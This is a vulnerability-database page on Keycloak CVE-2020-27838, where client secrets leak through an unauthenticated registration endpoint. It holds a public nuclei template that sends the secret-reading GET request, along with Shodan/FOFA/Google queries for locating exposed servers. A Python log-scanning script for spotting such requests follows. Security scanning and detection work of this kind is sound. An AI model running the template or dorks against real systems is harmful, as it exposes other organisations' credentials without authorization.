CVE-2020-27838: KeyCloak - Information Exposure

Date: 2025-08-01 | Affected software: KeyCloak | PoC: public

Vulnerability description

A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.

PoC code [public]

id: CVE-2020-27838

info:
  name: KeyCloak - Information Exposure
  author: mchklt
  severity: medium
  description: |
    A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
  impact: |
    The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
  remediation: |
    Apply the latest security patches or updates provided by the KeyCloak vendor.
  reference:
    - https://bugzilla.redhat.com/show_bug.cgi?id=1906797
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27838
    - https://github.com/muneebaashiq/MBProjects
    - https://github.com/j4k0m/godkiller
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-27838
    cwe-id: CWE-287
    epss-score: 0.89101
    epss-percentile: 0.99514
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - "title:\"keycloak\""
      - http.title:"keycloak"
      - http.html:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,exposure,redhat

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"clientId":\s*"security-admin-console"'
          - '"secret":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220254ed1dd7e011438dfbf5d551f1a065197d1087f7e19a543aa8de721b9ed7b01022100becfcfc9d93614e6a59ee78b1c5f64ed783bebea83dd1eb927f5aa1ecd291a2a:922c64590222798bb761d5b6d8e72950
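As an added defender-side example (not part of the nuclei template above and not Keycloak project code), the following Python script scans access-log lines for the request pattern the template sends: an anonymous GET on the default client registration endpoint that still returned 200, meaning a client representation was handed back without authentication. The log format, the trailing field recording whether an Authorization header was present, and the sample lines are constructed assumptions; Keycloak's default access log does not carry that field, so a real deployment would log it at the reverse proxy.

```python
import re

# Constructed sample access-log lines (assumption: an illustrative format, not
# Keycloak's default). Fields: client IP, timestamp, request line, status,
# bytes, and a final quoted field that is "-" when the request carried no
# Authorization header, or the auth scheme name when it did.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /auth/realms/master/clients-registrations/default/security-admin-console HTTP/1.1" 200 812 "-"
198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /auth/realms/master/clients-registrations/default/my-app HTTP/1.1" 200 640 "Bearer"
192.0.2.9 - - [01/Aug/2025:10:00:03 +0000] "GET /auth/realms/master/protocol/openid-connect/auth HTTP/1.1" 302 0 "-"
203.0.113.5 - - [01/Aug/2025:10:00:04 +0000] "GET /auth/realms/prod/clients-registrations/default/billing-api HTTP/1.1" 401 0 "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<auth>[^"]*)"$'
)

# Path of the default client registration provider as used in the template:
# the segment after "realms/" is the realm, the last segment the clientId read.
REG_PATH_RE = re.compile(
    r'^/auth/realms/(?P<realm>[^/]+)/clients-registrations/default/(?P<client_id>[^/?#]+)$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_unauthenticated_client_reads(log_text):
    """Return one finding per GET on the client registration endpoint that
    carried no Authorization header and still received a 200, i.e. the server
    returned a client representation (possibly including a secret) to an
    anonymous caller. Other statuses are not findings: no client data left
    the server."""
    findings = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if not entry or entry["method"] != "GET":
            continue
        path_match = REG_PATH_RE.match(entry["path"])
        if not path_match:
            continue
        if entry["status"] == "200" and entry["auth"] == "-":
            findings.append({
                "ip": entry["ip"],
                "timestamp": entry["ts"],
                "realm": path_match["realm"],
                "client_id": path_match["client_id"],
            })
    return findings


if __name__ == "__main__":
    for f in find_unauthenticated_client_reads(SAMPLE_LOG):
        print(f"ALERT unauthenticated client read: realm={f['realm']} "
              f"client={f['client_id']} from {f['ip']} at {f['timestamp']}")
```

Only the first sample line is reported: the second carried a bearer token, the third is a different endpoint, and the fourth was refused with 401. Pairing this alert with a check of the Keycloak version against 13.0.0 tells an analyst whether the 200 is exploitable exposure or a patched server answering an authenticated-looking request that the proxy mislabelled.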
